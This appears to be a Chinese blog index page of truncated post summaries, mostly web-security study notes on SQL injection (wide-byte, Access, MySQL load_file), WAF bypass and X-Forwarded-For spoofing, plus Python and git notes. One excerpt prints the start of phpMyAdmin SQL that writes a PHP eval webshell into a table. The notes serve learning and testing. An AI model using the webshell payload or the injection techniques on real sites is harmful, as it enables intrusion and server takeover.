DrKang

摘要： 0、前言 最近要为了自动化审计搜集所有PHP漏洞，在整理注入的时候，发现宽字节注入中使用iconv造成的漏洞原理没有真正搞懂，网上的文章也说得不是很清楚，于是看了荣哥（lxsec）以前发的一篇http://www.91ri.org/8611.html，加上我们两个人的讨论，最终有了这一篇深入的研究成 阅读全文

摘要： 以下转载，包含waf绕过方式 [目录] 0x0 前言 0x1 WAF的常见特征 0x2 绕过WAF的方法 0x3 SQLi Filter的实现及Evasion 0x4 延伸及测试向量示例 0x5 本文小结 0x6 参考资料 0x0 前言 促使本文产生最初的动机是前些天在做测试时一些攻击向量被WAF挡 阅读全文

摘要： [PhpMyAdmin后台拿Shell]CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiao 阅读全文

摘要： 前面有自己总结详细的mysql注入，自己access注入碰到的比较少，虽然比较简单，但是这里做一个总结 union联合查询法： 因为union前后字段数相同，所以可以先用order by 22 使查询结果按列序排序，确定当前有多少列，顺便直接爆出显示位 逐字猜解法： 查表：and exists (s 阅读全文

摘要： 而在多指标评价体系中，由于各评价指标的性质不同，通常具有不同的量纲和数量级。当各指标间的水平相差很大时，如果直接用原始指标值进行分析，就会突出数值较高的指标在综合分析中的作用，相对削弱数值水平较低指标的作用。因此，为了保证结果的可靠性，需要对原始指标数据进行标准化处理。 不同的标准化方法，对系统的评 阅读全文

摘要： 使用x Forward_for插件或者burpsuit可以改包，伪造任意的IP地址，使一些管理员后台绕过对IP地址限制的访问。 防护策略： 1.对于直接使用的 Web 应用，必须使用从TCP连接中得到的 Remote Address，才是用户真实的IP； 2.对于使用 nginx 反向代理服务器的W 阅读全文

摘要： 看写poc的时候看到的，思考了半天，现在解决了 转载自http://blog.csdn.net/zimou5581/article/details/53053775 Python中类分两种：旧式类和新式类： ➤新式类都从object继承，经典类不需要。 ➤新式类的MRO(method resolut 阅读全文

摘要： 平时只用参数匹配，偶尔看到别人的format用法楞住没反应过来，遂记下 阅读全文

摘要： 自己一段时间不用git，偶尔忘记，现在重新温习记录后便于查找 git clone git@github.com:aviraonepiece/Web-Security-Learning.git #创建新的分支，例如“dev” git checkout -b "dev“ 相当于 git branch d 阅读全文

摘要： mysql： 0x01 用load_fileh函数和hex函数配合，提高注入兼容性，利用错误提示来获取配置文件原始内容 以上load-file后跟的是文件位置路径,surname后跟的就是对应文件的hex值 group_concat函数与concat函数功能类似，将多个查询结果显示在一个显示位置里， 阅读全文